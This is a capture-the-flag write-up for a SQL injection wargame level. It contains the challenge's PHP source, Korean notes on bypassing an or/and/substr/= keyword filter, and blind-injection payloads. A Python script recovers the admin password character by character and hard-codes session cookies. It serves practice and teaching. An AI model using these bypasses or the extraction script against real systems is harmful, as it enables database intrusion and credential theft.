query : {$query}
";
// Runs the id-lookup query assembled above this excerpt (the echo that ends
// on the line before shows $query already exists). The `@` suppresses the
// driver's warnings and the legacy mysql_* functions are called without
// parameter binding, so whatever reached $query is executed verbatim.
// Defender's note: a prepared statement with a bound parameter is the real
// fix; the keyword blocklist the writeup describes is bypassable, as shown.
$result = @mysql_fetch_array(mysql_query($query));
// Boolean oracle: the greeting is echoed only when that query returned a row.
// This one bit of output is all the blind injection in the writeup reads back.
if($result['id']) echo "Hello {$result[id]}
";
// Second lookup: the submitted pw is quote-escaped here and compared against
// the stored pw of the admin row. The or/and/substr/= filter mentioned in the
// writeup presumably runs above this excerpt — not visible here.
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
// solve() is reached only when the supplied value equals the real admin pw,
// which is why the writeup recovers it character by character via the oracle.
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
// Publishes this file's own source, so the response body also contains the
// literal "Hello" from the echo above — worth remembering when matching on it.
highlight_file(__FILE__);
?>
or, and, substr(, = 을 필터링하고 있다.
or->||을 사용하면 된다!
and->%26%26을 사용하면 된다!
=->like을 사용하면 된다!
substr->substring을 사용하면 된다!
Blind SQL injection으로 패스워드 길이와 패스워드 자체를 알아내면 끝!
?pw=1'||id like 'admin'%26%26length(pw)>5 --%20
?pw=1'||id like 'admin'%26%26substring(pw,1,1)>50 --%20
import requests
def main() -> None:
    """Drive the boolean oracle described in the writeup above.

    Issues one HTTP GET per (position, candidate) pair against the challenge
    URL and treats the placement of the "Hello" greeting in the response as
    the true/false answer. Network I/O only; prints one line per recovered
    position and returns nothing.
    """
    # NOTE(review): live session cookies are hard-coded here. Publishing
    # session identifiers in a writeup is a credential leak; they should be
    # redacted or read from the environment instead.
    cookie={"__cfduid":"d282347679afbe7ce118657ef96dd67f61530072154","PHPSESSID":"25bfqp0uqr6pmep83spki2t522"}
    query='https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php'
    # Positions 1..8 only — presumably fixed from a length probe like the one
    # quoted earlier in the writeup; the script itself never checks the length.
    for i in range(1,9):
        # Candidate character code; the first increment below makes it 31.
        x=30
        while(1):
            x+=1
            # Same boolean-condition request as the writeup's manual example,
            # with the position and the candidate code filled in.
            query_add=query+"?pw=1'||id like 'admin'%26%26substring(pw,"+str(i)+",1)>char("+str(x)+") --%20"
            result=requests.get(query_add, cookies=cookie)
            # str.find returns the FIRST occurrence. The challenge page also
            # embeds its own source (which contains "Hello") after the output,
            # so an offset past 1000 presumably means the greeting was absent
            # from the output, i.e. the condition was false — TODO confirm the
            # 1000 threshold against an actual response.
            if(result.text.find("Hello")>1000):
                print("GOOD "+str(i)+": "+chr(x))
                break
# Entry guard: run the probe only when executed as a script, not on import.
if __name__ == "__main__":
    main()